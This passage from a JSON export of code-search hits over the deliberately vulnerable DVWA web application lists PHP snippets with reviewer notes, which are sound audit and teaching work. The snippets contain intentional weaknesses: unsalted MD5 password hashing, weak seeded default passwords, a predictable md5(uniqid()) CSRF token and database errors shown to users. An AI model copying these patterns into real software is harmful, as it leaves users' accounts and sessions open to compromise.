  "match": "<span class=\"line-number\">73:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> \"INSERT INTO guestbook VALUES <span class=\"token punctuation\">(</span><span class=\"token string\">'1'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'This is a test comment.'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'test'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">74:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">75:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table&lt;br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token 
variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">76:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> }\n<span class=\"highlight\"><span class=\"line-number\">78:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'guestbook' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">79:</span> \n<span class=\"line-number\">80:</span> \n<span class=\"line-number\">81:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Done\n<span class=\"line-number\">82:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"&lt;em>Setup 
successful&lt;/em>!\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">83:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">dvwaIsLoggedIn</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>",
  "line": 78,
  "start": 73,
  "end": 84,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 9,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/PGSQL.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">62:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'2'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Gordon'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Brown'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'gordonb'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'abc123'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}gordonb.jpg'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">63:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'3'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Hack'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Me'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'1337'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'charley'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}1337.jpg'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">64:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'4'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Pablo'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'Picasso'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'pablo'</span><span class=\"token punctuation\">,</span><span class=\"token 
function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'letmein'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}pablo.jpg'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">65:</span> \t<span class=\"token punctuation\">(</span><span class=\"token string\">'5'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'bob'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'smith'</span><span class=\"token punctuation\">,</span><span class=\"token string\">'smithy'</span><span class=\"token punctuation\">,</span><span class=\"token function\">MD5</span><span class=\"token punctuation\">(</span><span class=\"token string\">'password'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token string\">'{$baseUrl}smithy.jpg'</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">66:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">pg_query</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">67:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'users' table&lt;br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">pg_last_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" 
spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">68:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">69:</span> }\n<span class=\"line-number\">70:</span> \n<span class=\"line-number\">71:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'users' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">72:</span> ",
  "line": 67,
  "start": 62,
  "end": 73,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 10,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/PGSQL.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">66:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">pg_query</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">67:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'users' table&lt;br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">pg_last_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">68:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">69:</span> }\n<span class=\"line-number\">70:</span> \n<span class=\"highlight\"><span class=\"line-number\">71:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'users' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">72:</span> \n<span class=\"line-number\">73:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Create guestbook table\n<span class=\"line-number\">74:</span> \n<span class=\"line-number\">75:</span> <span class=\"token variable\">$drop_table</span> <span class=\"token operator\">=</span> \"DROP table <span class=\"token keyword\">IF</span> EXISTS guestbook<span class=\"token comment\" 
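spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">76:</span> ",
  "line": 71,
  "start": 66,
  "end": 77,
  "severity": "unknown",
  "note": "Pattern hit is the word inserted inside a status-message string, not an SQL statement. The point worth reviewing in this excerpt is line 67: pg_last_error() is appended to a message pushed to the page, so database error text reaches the browser. Log the error server-side and show a generic message."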
 },
 {
  "id": 11,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/PGSQL.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">86:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">87:</span> }\n<span class=\"line-number\">88:</span> \n<span class=\"line-number\">89:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"'guestbook' table was created.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">90:</span> \n<span class=\"highlight\"><span class=\"line-number\">91:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert data into <span class=\"token string\">'guestbook'</span></span>\n<span class=\"line-number\">92:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"INSERT INTO guestbook (comment, name) VALUES('This is a test comment.','admin')\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">93:</span> \n<span class=\"line-number\">94:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">pg_query</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">95:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table&lt;br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">pg_last_error</span><span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">96:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 91,
  "start": 86,
  "end": 97,
  "severity": "unknown",
  "note": "Pattern hit is a source comment. The INSERT assigned on line 92 is a constant string with no interpolated variables, so no injection path is visible in this excerpt."
 },
 {
  "id": 12,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/PGSQL.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">90:</span> \n<span class=\"line-number\">91:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Insert data into <span class=\"token string\">'guestbook'</span>\n<span class=\"line-number\">92:</span> <span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"INSERT INTO guestbook (comment, name) VALUES('This is a test comment.','admin')\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">93:</span> \n<span class=\"line-number\">94:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">pg_query</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">95:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table&lt;br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">pg_last_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">96:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">97:</span> }\n<span class=\"line-number\">98:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'guestbook' table.\"</span> <span class=\"token 
punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">99:</span> \n<span class=\"line-number\">100:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Setup successful!\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 95,
  "start": 90,
  "end": 101,
  "severity": "unknown",
  "note": "Pattern hit is the word inserted in an error message; the query on line 92 is a constant string. The message on line 95 appends pg_last_error(), so database error text is shown to the user. Prefer server-side logging plus a generic message."
 },
 {
  "id": 13,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/DBMS/PGSQL.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">93:</span> \n<span class=\"line-number\">94:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">pg_query</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">95:</span> \t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data could not be inserted into 'guestbook' table&lt;br />SQL: \"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">pg_last_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">96:</span> \t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">97:</span> }\n<span class=\"highlight\"><span class=\"line-number\">98:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Data inserted into 'guestbook' table.\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">99:</span> \n<span class=\"line-number\">100:</span> <span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"Setup successful!\"</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">101:</span> <span class=\"token function\">dvwaPageReload</span><span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">102:</span> \n<span class=\"line-number\">103:</span> <span class=\"token function\">pg_close</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$dbconn</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 98,
  "start": 93,
  "end": 104,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 234,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/help/help.php",
  "filetype": "php",
  "search": "\\sinsert",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">&lt;</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">&lt;</span>table width<span class=\"token operator\">=</span><span class=\"token string\">'100%'</span> bgcolor<span class=\"token operator\">=</span><span class=\"token string\">'white'</span> style<span class=\"token operator\">=</span><span class=\"token string\">\"border:2px #C0C0C0 solid\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token operator\">&lt;</span>tr<span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">&lt;</span>td<span class=\"token operator\">></span><span class=\"token operator\">&lt;</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\">&lt;</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>A SQL injection attack consists of insertion <span class=\"token operator\">or</span> <span class=\"token string\">\"injection\"</span> of a SQL query via the input data from the client <span class=\"token keyword\">to</span> the application<span class=\"token punctuation\">.</span></span>\n<span class=\"line-number\">10:</span> \t\t\tA successful SQL injection exploit can read sensitive data from the database<span class=\"token punctuation\">,</span> modify database data <span class=\"token punctuation\">(</span>insert<span 
class=\"token operator\">/</span>update<span class=\"token operator\">/</span>delete<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> execute administration operations on the database\n<span class=\"line-number\">11:</span> \t\t\t<span class=\"token punctuation\">(</span>such as shutdown the DBMS<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> recover the content of a given file present on the DBMS file system <span class=\"token punctuation\">(</span>load_file<span class=\"token punctuation\">)</span> <span class=\"token operator\">and</span> <span class=\"token keyword\">in</span> some cases issue commands <span class=\"token keyword\">to</span> the operating system<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">&lt;</span>p<span class=\"token operator\">></span>SQL injection attacks are a type of injection attack<span class=\"token punctuation\">,</span> <span class=\"token keyword\">in</span> which SQL commands are injected into data<span class=\"token operator\">-</span>plane input <span class=\"token keyword\">in</span> order <span class=\"token keyword\">to</span> effect the execution of predefined SQL commands<span class=\"token punctuation\">.</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">14:</span> ",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": "Pattern hit is prose in the SQL injection help page (the words insertion and insert), not executable SQL. No query is built in this excerpt; treat as a false positive for this search."
 },
 {
  "id": 24,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">524:</span> \n<span class=\"line-number\">525:</span> function <span class=\"token function\">generateSessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {  # Generate a brand new <span class=\"token punctuation\">(</span>CSRF<span class=\"token punctuation\">)</span> token\n<span class=\"line-number\">526:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">527:</span> \t\t<span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">528:</span> \t}\n<span class=\"highlight\"><span class=\"line-number\">529:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">530:</span> }\n<span class=\"line-number\">531:</span> \n<span class=\"line-number\">532:</span> function <span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span 
class=\"token punctuation\">)</span> {  # Destroy any session <span class=\"token keyword\">with</span> the name <span class=\"token string\">'session_token'</span>\n<span class=\"line-number\">533:</span> \t<span class=\"token function\">unset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">534:</span> }",
  "line": 529,
  "start": 524,
  "end": 535,
  "severity": "unknown",
  "note": "The CSRF token on line 529 is md5(uniqid()). uniqid() is derived from the current time and is not a cryptographically secure source, and hashing it with MD5 adds no entropy, so the token may be predictable. Generate the token from a CSPRNG instead, for example bin2hex(random_bytes(32)) on PHP 7 or later, and compare it with hash_equals()."
 },
 {
  "id": 49,
  "file": "/home/chris/src/DVWA-master/login.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span 
class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$query</span> <span class=\"token 
operator\">=</span> <span class=\"token punctuation\">(</span>\"<span class=\"token keyword\">SELECT</span> table_schema<span class=\"token punctuation\">,</span> table_name<span class=\"token punctuation\">,</span> create_time\n<span class=\"line-number\">24:</span> \t\t\t\tFROM information_schema<span class=\"token punctuation\">.</span>tables\n<span class=\"line-number\">25:</span> \t\t\t\tWHERE table_schema<span class=\"token operator\">=</span><span class=\"token string\">'{$_DVWA['</span>db_database<span class=\"token string\">']}'</span> <span class=\"token operator\">AND</span> table_name<span class=\"token operator\">=</span><span class=\"token string\">'users'</span>\n<span class=\"line-number\">26:</span> \t\t\t\tLIMIT <span class=\"token number\">1</span>\"<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 21,
  "start": 16,
  "end": 27,
  "severity": "unknown",
  "note": "Line 21 reduces the submitted password to an unsalted MD5 digest. MD5 is fast to compute and unsuited to password storage; password_hash() with password_verify() is the standard PHP replacement. The value also passes through stripslashes() and mysqli_real_escape_string() on lines 19-20 before hashing, which alters the password that gets hashed."
 },
 {
  "id": 69,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/high.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span 
